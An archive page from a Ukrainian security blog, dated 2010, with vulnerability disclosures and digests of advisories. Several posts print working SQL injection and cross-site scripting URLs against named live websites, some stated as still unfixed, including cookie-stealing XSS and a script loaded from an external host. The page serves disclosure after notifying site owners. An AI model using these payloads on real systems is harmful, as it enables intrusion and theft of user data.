Архів для категорії 'Уразливості'

Уразливості в CMS MYsite

15:24 25.09.2010

29.06.2010

У листопаді, 20.11.2009, я знайшов Full path disclosure, Cross-Site Scripting та SQL Injection уразливості в CMS MYsite (це українська комерційна CMS). Які я виявив на lookmy.info - сайті розробників системи. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

25.09.2010

Full path disclosure:

http://site/portal/modules.php?name=Ads

XSS:

http://site/portal/modules.php?name=Web_Links&l_op=search&query=%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20

SQL Injection:

http://site/print.php?id=1&pid=-1%20or%201=1

CMS MYsite зроблена на основі PHP-Nuke, тому SQL Injection подібна до уразливості, що я знаходив в PHP-Nuke та його клонах декілька років тому. В даній CMS можуть бути й інші дірки PHP-Nuke.

Дані уразливості вже виправлені розробником після мого повідомлення (як мінімум в себе на сайті). Але зазначу, що хоча XSS виправлена, але не якісно, тому при виключених mq на сайті (це потрібно для використання лапок) можна провести XSS атаку (для виконання коду або редирекції на інші сайти), зокрема з використанням MouseOverJacking.

Добірка уразливостей

15:07 24.09.2010

В даній добірці уразливості в веб додатках:

  • Cherokee Web Server 0.5.3 Multiple Vulnerabilities (деталі)
  • Re: Cherokee Web Server 0.5.4 Denial Of Service (деталі)
  • Zoph Multiple Parameter Cross Site Scripting Vulnerabilities (деталі)
  • iScripts SocialWare 2.2.x Multiple Remote Vulnerability (деталі)
  • Canteen Joomla Component 1.0 Multiple Remote Vulnerabilities (деталі)
  • iScripts MultiCart 2.2 Multiple SQL Injection Vulnerability (деталі)
  • Joomla BookLibrary From Same Author Module “id” SQL Injection (деталі)
  • NTSOFT BBS E-Market Professional = XSS / Remote Execution Code (деталі)
  • XM Easy Personal FTP Server Remote DoS Vulnerability (деталі)
  • XM Easy Personal FTP Server ‘APPE’ and ‘DELE’ Command Remote Denial of Service Vulnerability (деталі)

Уразливості на feedvalidator.org

23:59 23.09.2010

В серпні, 15.08.2010, я знайшов Abuse of Functionality та Insufficient Anti-automation на сайті http://feedvalidator.org. Про що найближчим часом сповіщу адміністрацію сайта.

Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти.

Abuse of Functionality:

http://feedvalidator.org/check.cgi?url=http://www.google.com

Даний функціонал може використовуватися для атаки на інші сайти. А також для проведення DoS атаки на сам сайт.

Insufficient Anti-automation:

В даному функціоналі немає захисту від автоматизованих запитів (капчі).

Уразливість на rawfoodsnewsmagazine.com

15:20 23.09.2010

21.01.2010

У травні, 24.05.2009, я знайшов SQL Injection уразливість на сайті http://www.rawfoodsnewsmagazine.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

23.09.2010

SQL Injection:

http://www.rawfoodsnewsmagazine.com/modules.php?op=modload&name=News&file=article&sid=-1%20or%20version()=5

Уразливість досі не виправлена.

Добірка уразливостей

16:12 22.09.2010

В даній добірці уразливості в веб додатках:

  • Joomla BookLibrary Component Four SQL Injection Vulnerabilities (деталі)
  • HP Power Manager “formExportDataLogs” Directory Traversal (деталі)
  • HP Power Manager “formExportDataLogs” Buffer Overflow (деталі)
  • HP Power Manager, Remote Execution of Arbitrary Code (деталі)
  • HP Power Manager, Remote Execution of Arbitrary Code (деталі)
  • Hewlett-Packard Power Manager Administration Web Server Stack Overflow Vulnerability (деталі)
  • HP Power Manager, Remote Execution of Arbitrary Code (деталі)
  • iScripts EasySnaps 2.0 Multiple SQL Injection Vulnerabilities (деталі)
  • iScripts ReserveLogic 1.0 SQL Injection Vulnerability (деталі)
  • iScripts CyberMatch 1.0 Blind SQL Injection Vulnerability (деталі)

Уразливість на webheim.com

15:03 21.09.2010

20.01.2010

У травні, 24.05.2009, я знайшов SQL Injection уразливість на сайті http://webheim.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

21.09.2010

SQL Injection:

http://webheim.com/modules.php?op=modload&name=News&file=article&sid=-1%20or%20version()=3.23

Уразливість досі не виправлена.

Добірка уразливостей

15:04 20.09.2010

В даній добірці уразливості в веб додатках:

  • New libhtml-parser-perl packages fix denial of service (деталі)
  • SQL injection vulnerability in Grafik CMS (деталі)
  • XSS vulnerability in PortalApp (деталі)
  • SQL injection vulnerability in TomatoCMS (деталі)
  • Multiple XSS in TornadoStore 1.4.3 (деталі)
  • Multiple SQL Injection in TornadoStore 1.4.3 (деталі)
  • Harris Stratex StarMAX subscriber station running config CSRF exploit (деталі)
  • SAP’s web module OLK SQL Injection vulnerability (деталі)
  • Cross-site AJAX request vulnerability in Asterisk (деталі)
  • SIP responses expose valid usernames in Asterisk (деталі)

Уразливості на www.museodecera.com.mx

16:02 18.09.2010

18.01.2010

У травні, 18.05.2009, я знайшов SQL Injection, Full path disclosure та Information Leakage уразливості на сайті http://www.museodecera.com.mx. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

18.09.2010

SQL Injection:

http://www.museodecera.com.mx/guestbook/index.php?action=jump&id=-1%20union%20select%20version()

Full path disclosure:

http://www.museodecera.com.mx/guestbook/config.inc.php

Information Leakage:

http://www.museodecera.com.mx/guestbook/index.php

В meta-тегах виводиться інформація про версію PHP, MySQL і веб сервера.

Дані уразливості досі не виправлені.

Добірка уразливостей

15:27 17.09.2010

В даній добірці уразливості в веб додатках:

Нові уразливості на rozetka.com.ua

18:02 16.09.2010

06.01.2010

У травні, 06.05.2009, я знайшов нові уразливості на сайті http://rozetka.com.ua, зокрема Full path disclosure та Cross-Site Scripting (в тому числі persistent XSS). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на www.allo.ua. Також раніше я вже писав про уразливості на www.rozetka.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

16.09.2010

Full path disclosure:

http://rozetka.com.ua/index.php?page=search&search_text=%3C%3E

XSS:

http://rozetka.com.ua/index.php?page=search&search_text=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://rozetka.com.ua/search/?text=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (single-user persistent XSS):

На сторінках товарів (http://rozetka.com.ua/ru/products/comments/ 6074/index.html) в полях Имя і e-mail, які також зберігаються в кукісі.

XSS (single-user persisted XSS, коли користувач залогінений на сайті):

На сторінці http://rozetka.com.ua/account.php (поля Имя и Фамилия, Email, Адрес строка 1, Адрес строка 2, Город/Поселок, Регион/Область/Район, Почтовый индекс, Ваш телефон) та на кожній зовнішній сторінці сайта (поле Имя).

Дані уразливості вже виправлені шляхом зміни движка.